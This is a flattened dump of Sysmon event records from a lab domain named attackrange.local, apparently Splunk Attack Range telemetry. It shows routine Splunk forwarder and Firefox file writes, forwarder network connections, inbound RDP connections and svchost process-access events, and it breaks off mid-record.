23542300x80000000000000001050431Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:35.805{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E8D66552EA9C12BBCFA2F161097F61B,SHA256=A8D60B8FAA9BFC8DE0E6824396F8996DFA37B56B64A4D469C62F8F38EAF9AF9B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808380Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:34.276{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57321-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808379Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:35.085{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DC8E35B39C92421B01227361F4DFDFB,SHA256=B9C5558B10FE7753DAA355732F7D7E82AFBC455738D34E67047B5531A395A679,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050432Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:36.806{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61BDAC1E23E932C24034BCA2B28028F3,SHA256=89EBD50EE609BF4D1680BDCB07AB00ECE05AA3DA99D1B80501DA3157DF7CB2C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808381Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:36.085{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20CCF4479B9B693071E434095E4C3B6D,SHA256=50870837FF4C54FCB4496263224E435C6A11F979810182904489AC0E0146EC68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050433Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:37.821{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6CC248960B7D31B024E7C0EBFCC4757,SHA256=CEDD598CC49D9351233C2750EAB64F5FBCAEB2614DEB202358DA15BDBE765689,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808382Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:37.163{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=124ABA2873B1EF2780DC36E890ED4FBF,SHA256=68AE0EEFC997B70C9C50F07693A290A43449AB2374DB2FA80ED859479E77E797,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050446Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:38.822{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E94BF2C7FFB138F2B89F3D518A533FC0,SHA256=6222E4DEE557A7EADE346B98F8FDF1C1619906FB110CF6EC733210245CE703B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808383Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:38.195{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50600FE591C1ECE88D0D6BC8108D549F,SHA256=2C6C62FD7F802A72EEF02742FE884FF2FFD6AC6C5FEBF0E02F4627447A4656DA,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001050445Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:38.567{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=5C5AFFB1B9551793FF69D5610605347B,SHA256=C768A49AC740D017E0DEDD6F3CE4227AEEB3422170FBCB1F61847492C8B98021,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050444Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:38.052{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=29311D20573FFE5442B4260C5EE5CC57,SHA256=FE12F28C9C473B5D2E06D79A12627647374B60082A1C469E50952CA14CB658A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050443Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:38.052{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=59C8415FF6ED8F4030BBA92FEB248AAA,SHA256=02F3D0A2101DA5ED8CF4F968CE7FFF68BBD0AC084F0FE0F6A89E97965E69B9AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050442Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:38.052{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D358BC3B5AC64CB9423269834D79697F,SHA256=C77B9FF798C995742A8979E855CA1B5540D68E4B9B226E610D224BD3874D91C9,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001050441Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:38.052{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D2A9B3873BA74A4D4776A6F2288B7E1F,SHA256=E51AC6E84B22B3F3555BD87A387DD4956D8DDAF431853CC43D9C1EEC93A4BEB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050440Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:38.052{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5FE9E02936E3D7EA1835A6DF6AB0619C,SHA256=0A7743DDC9264642BAD6AE6AC29439EF469A5772CCA52849F8A9D76F006F55BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050439Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:38.041{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F0A06660E6E1D9C73DDBFB7E8401E7EF,SHA256=0B7839835CAC684946E93D4CE6020850DD41E96A99336D5A5292BE174656A239,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050438Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:38.041{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A415C81EDC665E6CB75900669147D053,SHA256=83B4FEE9D9F4C63D85085E5DC3259C669E12B0F1A09C91B0EBB72820264C42F9,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001050437Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:38.041{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=60CCE946B4B6952EB56A1174A74F1045,SHA256=62DDA64F07B0F8E6C30582BC34296BEAF5ABAA62FBB0D35B2BCE7A64270488A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050436Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:38.041{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=72CFCB320DDA76E7EF2CC44C1753CA36,SHA256=609EDF6EFEF5F6D46DE7B75E79ABBBE5026FC735116820BF08E331BA643CBB9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050435Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:38.041{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=EA2FDE5870EDCDFD2C0D3C85B0314A64,SHA256=F8D3E3C20C290ABA7D6903564D7AD08CF735A74C81D34F48D26BA12CD45C656B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050434Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:38.041{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1C05AA75CAB1B98CE1AFCAFC924B8A7B,SHA256=CCEA4D494D1C8EE78D25407EE557094C70102B65D9F276E62743D2988E94432E,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001050448Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:39.825{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33C801C903FAC50C46C88062B7D2C576,SHA256=2464EAD8342C4BB43997A1488DD59C6DB9B3AEB3C7663A9E3D4F5112E306E609,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808387Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:37.616{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse93.86.161.15593-86-161-155.static.isp.telekom.rs57278-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000808386Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:39.273{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65200BCDF717C62B4CF2DD8AFC43601A,SHA256=F41E25B3252A246F8A2591A8D4EA7F10CF564AAFD3D56B335DB13585FD009564,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050447Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:30.659{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51087-false10.0.1.12-8000- 23542300x8000000000000000808385Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:39.163{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7D0E3394E0EC6AFD6D3FFA043A51E4EA,SHA256=6831E2C26CA41BA908D9BB7C9256D6C51119E4142E93A1DD35B22E12C7D70BF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808384Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:39.163{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EC245F043462AD9EDF5443E0EE92C813,SHA256=9D223C56E0F21E258F4EE9352E5FE29C342EB0E17CACD3B4A981DC431154DBDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050449Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:40.840{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2821C70F67A9FAC0B363A7D9228FB63B,SHA256=55AB2984A52468377710055ACCAED23B6B2656C445FD1335DC714449CCB1A2B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808388Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:40.273{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF3924CDA665ED002B47EAC8C9F80EE7,SHA256=70CCED71F0DADCFC80AA3324A16F0EA3E40071E3845D77A24D80C30C8192EC19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050450Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:41.854{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=951C6CDB4D56A5E1D91C1676BF928427,SHA256=940B3CC082D5BF77C7993EF345D14870C32D34E30575497EC1CD3FA47C8C8E9E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808392Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:40.218{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57322-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000808391Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:39.634{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse122.226.223.195-58411-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000808390Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:41.288{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7D0E3394E0EC6AFD6D3FFA043A51E4EA,SHA256=6831E2C26CA41BA908D9BB7C9256D6C51119E4142E93A1DD35B22E12C7D70BF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808389Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:41.273{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAAF6851C2B69EC9686BFC1E6A76DCE3,SHA256=F2B591B631B4BC83F45B36250CE53F4AFA6952216910966BA4F0A27CB4369487,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050467Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:42.855{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA941EF5AA20329526C6DA0842D3A1A7,SHA256=2C9E9AD01F4DD909F7D6FFA16D5626CB6FA23F9EFC84B05C6E3CA5C5BF695AD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808393Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:42.288{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0CA6CA1A252F32B8B44DA780734DCE7,SHA256=253274AD6C80673B5B90E0FE04E643773350B007D6AA66DB5C32CFC275BD00EC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050466Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050465Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001050464Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050463Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050462Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001050461Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050460Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050459Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 